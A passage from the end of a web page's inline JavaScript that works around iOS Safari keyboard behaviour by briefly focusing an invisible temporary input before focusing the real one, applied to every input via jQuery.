      timeout = 100;
    }
    if(el) {
      // Align temp input element approximately where the input element is
      // so the cursor doesn't jump around
      var __tempEl__ = document.createElement('input');
      __tempEl__.style.position = 'absolute';
      __tempEl__.style.top = (el.offsetTop + 7) + 'px';
      __tempEl__.style.left = el.offsetLeft + 'px';
      __tempEl__.style.height = 0;
      __tempEl__.style.opacity = 0;
      // Put this temp element as a child of the page <body> and focus on it
      document.body.appendChild(__tempEl__);
      __tempEl__.focus();

      // The keyboard is open. Now do a delayed focus on the target element
      setTimeout(function() {
        el.focus();
        //el.click();
        // Remove the temp element
        document.body.removeChild(__tempEl__);
      }, timeout);
    }
  }

  function fixSafariIOS(elemento){
    var isSafari = !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/);
    var isIOS = (/iPad|iPhone|iPod/.test(navigator.userAgent) ||
        (navigator.platform === 'MacIntel' && navigator.maxTouchPoints > 1)) &&
        !window.MSStream;
    if (isIOS) {
      var inputElement = document.getElementById(elemento);
      var modalFadeInDuration = 100;
      focusAndOpenKeyboard(inputElement, modalFadeInDuration); // or without the second argument
    }
  }

  function focusAndOpenKeyboardAll(el) {
    // create invisible dummy input to receive the focus first
    var  fakeInput = document.createElement('input');
    fakeInput.setAttribute('type', 'text');
    fakeInput.style.position = 'absolute';
    fakeInput.style.opacity = 0;
    fakeInput.style.height = 0;
    fakeInput.style.fontSize = '16px'; // disable auto zoom

    // you may need to append to another element depending on the browser's auto
    // zoom/scroll behavior
    document.body.prepend(fakeInput);

    // focus so that subsequent async focus will work
    fakeInput.focus();

    setTimeout(function() {
      // now we can focus on the target input
      el.focus();
      // cleanup
      fakeInput.remove();
    }, 100);

  }

  function fixSafariIOSAll(elemento){
    var isIOS = (/iPad|iPhone|iPod/.test(navigator.userAgent) ||
        (navigator.platform === 'MacIntel' && navigator.maxTouchPoints > 1)) &&
        !window.MSStream;
    if (isIOS) {
      focusAndOpenKeyboardAll(elemento); // or without the second argument
    }
  }

  jQuery('input').on('click', function(e) {
    fixSafariIOSAll(e.target)
  });

</script>



</body></html>